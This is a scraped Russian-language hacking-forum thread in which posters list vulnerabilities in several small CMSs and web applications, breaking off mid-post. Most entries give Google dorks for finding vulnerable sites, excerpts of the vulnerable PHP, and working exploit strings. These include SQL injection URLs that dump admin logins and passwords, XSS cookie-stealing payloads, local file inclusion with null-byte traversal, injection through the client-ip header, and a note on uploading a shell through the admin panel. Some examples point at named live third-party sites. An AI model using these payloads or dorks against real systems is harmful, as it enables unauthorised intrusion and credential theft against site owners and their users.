ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
28.11.2010, 15:34
|
|
Новичок
Регистрация: 20.04.2010
Сообщений: 1
Провел на форуме:
4855
Репутация:
0
|
|
Creativestate
Тип уязвимости: SQL inj
http://www.creativestate.com/work
dork:Site design by Creative State
админка:localhost/admin/
пример:/index.cfm?id=-2%20union%20select%201,2,3,4,5,6,7,8,group_concat( managerLogin,0x3a,managerPassword)%20from%20manage rs%20--
|
|
|
11.12.2010, 22:12
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Web@all CMS
http://webatall.com/
XSS
Вписываем в поле поиска (сразу под формой входа в правом верхнем углу,если кто ненашел):
Код:
Code:
alert(document.cookie)
|
|
|
|
20.12.2010, 15:15
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Дополнение к посту Root-access
CompactCMS
офф сайт: compactcms.nl
XSS
content/403.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR]
Пример:
Код:
Code:
http://demo.compactcms.nl/content/403.php?page=alert(document.cookie)
Тоже самое в файле 404.php по соседству.
|
|
|
|
10.01.2011, 18:27
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
xzengine 1.7 beta 8
Офф сайт xzengine.ru
DORK : "Powered by xzengine"
SQL injection
Крутим через ошибку,пример на нескольких сайтах:
Код:
Code:
http://xzengine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
http://glassofvine.ru/index.php?category=1+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+
http://hightvoltage.net/index.php?category=1+and+ExtractValue(1,concat(0x5c,(select+version())))--+
XSS
Пример:
Код:
Code:
http://xzengine.ru/index.php?category=1-->alert(1)
Заливка шелла,нужны права админа
В админке "загрузить файл",льем наш шелл и он будет по адресу site.com/upload/shell.php
//если есть возможность(двиг не платный) то показывайте уязвимый код. (Konqi)
Фараон
Не совсем так,даже если ты закоментируешь обращение к бд ето,то инъекция будет,т.к. там еще 2 обращение к бд с этой переменной.И зачем ты копировал мой пост?
|
|
|
|
10.01.2011, 20:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
34733
Репутация:
83
|
|
Дополнение к посту ~d0s~(#444):
Xzengine 1.7 beta 8
SQL injection:
/index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
require_once[/COLOR][COLOR="#DD0000"]'./classes/viewnews.php'[/COLOR][COLOR="#007700"];
...
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]]))
[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'category'[/COLOR][COLOR="#007700"]];
...
[/COLOR][/COLOR]
/viewnews.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"])
{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);
}
else
{[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]AbstractDataBase[/COLOR][COLOR="#007700"]::[/COLOR][COLOR="#0000BB"]Instance[/COLOR][COLOR="#007700"]()->[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'SELECT * FROM '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]DATABASE_TBLPERFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'news WHERE news_fixed = 0 AND news_approve = 1 AND news_view = 1 AND news_category = '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$category[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]' ORDER BY news_id DESC LIMIT '[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]','[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$newsperpage[/COLOR][COLOR="#007700"]);
}
...
[/COLOR][/COLOR]
Пример:
Код:
Code:
http://eng/index.php?category=3%20union%20select%20concat_ws(0x3a,users_login,users_password),2,3,4,5,6,7,8,9,10,11,12,13%20from%20xz_users%20limit%200,1--
|
|
|
|
30.01.2011, 23:06
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Sobak CMS 0_2
Скачате: http://sourceforge.net/projects/sobakcms/
LFI
Need: rg = on ; mq = off
index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'id'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$isInWebs[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"]) {
include ([/COLOR][COLOR="#DD0000"]'webs/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][/COLOR]
эксплуатация:
Код:
Code:
http://localhost/sobak/index.php?isInWebs=1&id=../robots.txt%00
|
|
|
|
23.02.2011, 22:53
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
Ragnarok Online Site Engine
http://sourceforge.net/projects/ro-se/
SQLi
include_before.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getIP[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#FF8000"]// был ли сегодня, если нет то добавим хапись вместе с реф страницей, если был, то добавим счетчик за этот день
[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT count(*) as cnt FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ros_db'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".ros_counter WHERE DATE_FORMAT(date, '%Y%m%d')='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ymd"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' and `ip`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]GetAll[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#DD0000"]'cnt'[/COLOR][COLOR="#007700"]]){[/COLOR][COLOR="#FF8000"]// был сегодня, обновим счетчик
[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ros_db'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".ros_counter SET `count`=`count`+1 WHERE DATE_FORMAT(date, '%Y%m%d')='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Ymd"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' and `ip`='"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
}else{[/COLOR][COLOR="#FF8000"]// ненбыло сегодня, добавим с реферрером
[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'ros_db'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]".ros_counter (`count`, `ip`, `ref`, `date`) VALUES ('1', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_REFERER"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', NOW())"[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][/COLOR]
/include/functions.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]getIP[/COLOR][COLOR="#007700"]() {
if([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_CLIENT_IP"[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_CLIENT_IP"[/COLOR][COLOR="#007700"]);
} elseif([/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_X_FORWARDED_FOR"[/COLOR][COLOR="#007700"])) {
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"HTTP_X_FORWARDED_FOR"[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]getenv[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"REMOTE_ADDR"[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]$ip[/COLOR][COLOR="#007700"];
}
[/COLOR][/COLOR]
/include/db_connect.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$DB[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]){
global[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"];
if(isset([/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'debug'[/COLOR][COLOR="#007700"]]) &&[/COLOR][COLOR="#0000BB"]$config[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'debug'[/COLOR][COLOR="#007700"]]){
echo[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"
\n"[/COLOR][COLOR="#007700"];
}
if([/COLOR][COLOR="#0000BB"]$DB[/COLOR][COLOR="#007700"]){
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$DB[/COLOR][COLOR="#007700"]);
}else{
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"]);
}
if([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]()){
echo[/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"
\n"[/COLOR][COLOR="#007700"];
echo[/COLOR][COLOR="#DD0000"]"query:"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$query[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"
\n"[/COLOR][COLOR="#007700"];
return[/COLOR][COLOR="#0000BB"]null[/COLOR][COLOR="#007700"];
}else{
return[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"];
}
}
[/COLOR][/COLOR]
Как видно из кода у нас инъекция в хедере при чем в селекте и инсерте, покажу варианты раскрутки. Еще больше меня порадовала функция запроса, в случае ошибки она выводит саму ошибку + сам запрос, и нет никаких exit`ov и die`v.
Эксплуатация: http://site.com/index.php
Код:
Code:
client-ip: 'and(select*from(select(name_const(version(),1)),name_const(version(),1))a)and'
либо
Код:
Code:
client-ip: ', 'lala', NOW()) on duplicate key update a=(select 1 from(select count(*) from information_schema.tables group by concat(version(),floor(rand(0)*2)))a)-- 1
|
|
|
|
01.03.2011, 03:31
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
EyeX CMS
http://sourceforge.net/projects/eyex/
SQLi / LFI
Need:
mq=off
index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec'[/COLOR][COLOR="#007700"]];
if(empty([/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"])){[/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'sec'[/COLOR][COLOR="#007700"]]; }
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]if(empty([/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]}
}else{
[/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT mod_status, mod_folder FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_CPBD[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_mods WHERE mod_folder='[/COLOR][COLOR="#0000BB"]$sec[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"]);
list([/COLOR][COLOR="#0000BB"]$mod_status[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]sql_cls[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$mainfun3[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]file_exists[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"])){
if([/COLOR][COLOR="#0000BB"]is_admin[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$admin[/COLOR][COLOR="#007700"])){
include([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"]);
}else{
if([/COLOR][COLOR="#0000BB"]$mod_status[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"]){
include([/COLOR][COLOR="#DD0000"]"Addons/mods/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$mod_folder[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"/main.php"[/COLOR][COLOR="#007700"]);
}else{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: error.php?code=NOACTIVE"[/COLOR][COLOR="#007700"]);
}
}
}else{
[/COLOR][COLOR="#0000BB"]header[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Location: error.php?code=NOMOD"[/COLOR][COLOR="#007700"]);
}
}
[/COLOR][/COLOR]
/system/sql_functions.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_QUERY"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_query"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_FETCH"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_fetch_row"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_SQL_NROWS"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"mysql_numrows"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_QUERY[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_FETCH[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$dbnum[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_SQL_NROWS[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
Ну думаю тут все ясно, полученный результат из выборки инклюдится.
Эксплуатация:
Код:
Code:
http://localhost/eyexcms/index.php?sec=assdas'+union+select+1,'../../readme.txt%00'-- 1
SQLi
Need:
mq=off
/Addons/mods/news/main.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'st'[/COLOR][COLOR="#007700"]];
if(empty([/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'st'[/COLOR][COLOR="#007700"]];
}
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]ReadStory[/COLOR][COLOR="#007700"](){
global[/COLOR][COLOR="#0000BB"]$bgtable[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$dbnum[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$bgtable[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'article'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]ROhead[/COLOR][COLOR="#007700"]();
if(empty([/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#007700"])){
[/COLOR][COLOR="#0000BB"]wmsg[/COLOR][COLOR="#007700"]();
}
[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT nid, ntitle, ntext, ndate, nautor, topic FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]_CPBD[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_news WHERE nid='[/COLOR][COLOR="#0000BB"]$article[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$link2[/COLOR][COLOR="#007700"]);
list([/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntext[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ndate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nautor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]$dbfetch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]change_tpl[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nautor[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntitle[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ntext[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ndate[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$topic[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]comentarios[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$nid[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]ROfoot[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]sql_cls[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]);
}
[/COLOR][COLOR="#FF8000"]//...
[/COLOR][COLOR="#007700"]switch([/COLOR][COLOR="#0000BB"]$st[/COLOR][COLOR="#007700"]){
case[/COLOR][COLOR="#DD0000"]"ReadStory"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]ReadStory[/COLOR][COLOR="#007700"]();break;
case[/COLOR][COLOR="#DD0000"]"SaveComment"[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]SaveComment[/COLOR][COLOR="#007700"]();break;
default:[/COLOR][COLOR="#0000BB"]index[/COLOR][COLOR="#007700"]();break;
}
[/COLOR][/COLOR]
Эксплуатация:
Код:
Code:
http://localhost/eyexcms/index.php?sec=news&st=ReadStory&article=-1'+union+select+1,version(),3,4,5,6-- 1
|
|
|
|
15.03.2011, 23:41
|
|
Познающий
Регистрация: 17.04.2010
Сообщений: 75
Провел на форуме:
691279
Репутация:
55
|
|
mapmyglobe
http://sourceforge.net/projects/mapmyglobe/
BSQLi
/user/caccnut.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'username'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password1[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password1'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$password2[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password2'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'email'[/COLOR][COLOR="#007700"]];
require_once[/COLOR][COLOR="#DD0000"]'../lib/dbconfig.php'[/COLOR][COLOR="#007700"];
require_once[/COLOR][COLOR="#DD0000"]'../lib/liblogin.php'[/COLOR][COLOR="#007700"];
require_once[/COLOR][COLOR="#DD0000"]'../lib/config.php'[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$password1[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#0000BB"]$password2[/COLOR][COLOR="#007700"]){
echo[/COLOR][COLOR="#DD0000"]"Different passwords. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
if ([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]is_numeric[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]substr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$username[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]))){
echo[/COLOR][COLOR="#DD0000"]"Username must start with a letter. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
if ([/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"^[a-zA-Z0-9_]+@[a-zA-Z0-9\-]+\.[a-zA-Z0-9\-\.]+$]"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$email[/COLOR][COLOR="#007700"])){
echo[/COLOR][COLOR="#DD0000"]"Wrong email format. Please try again."[/COLOR][COLOR="#007700"];
exit;
}
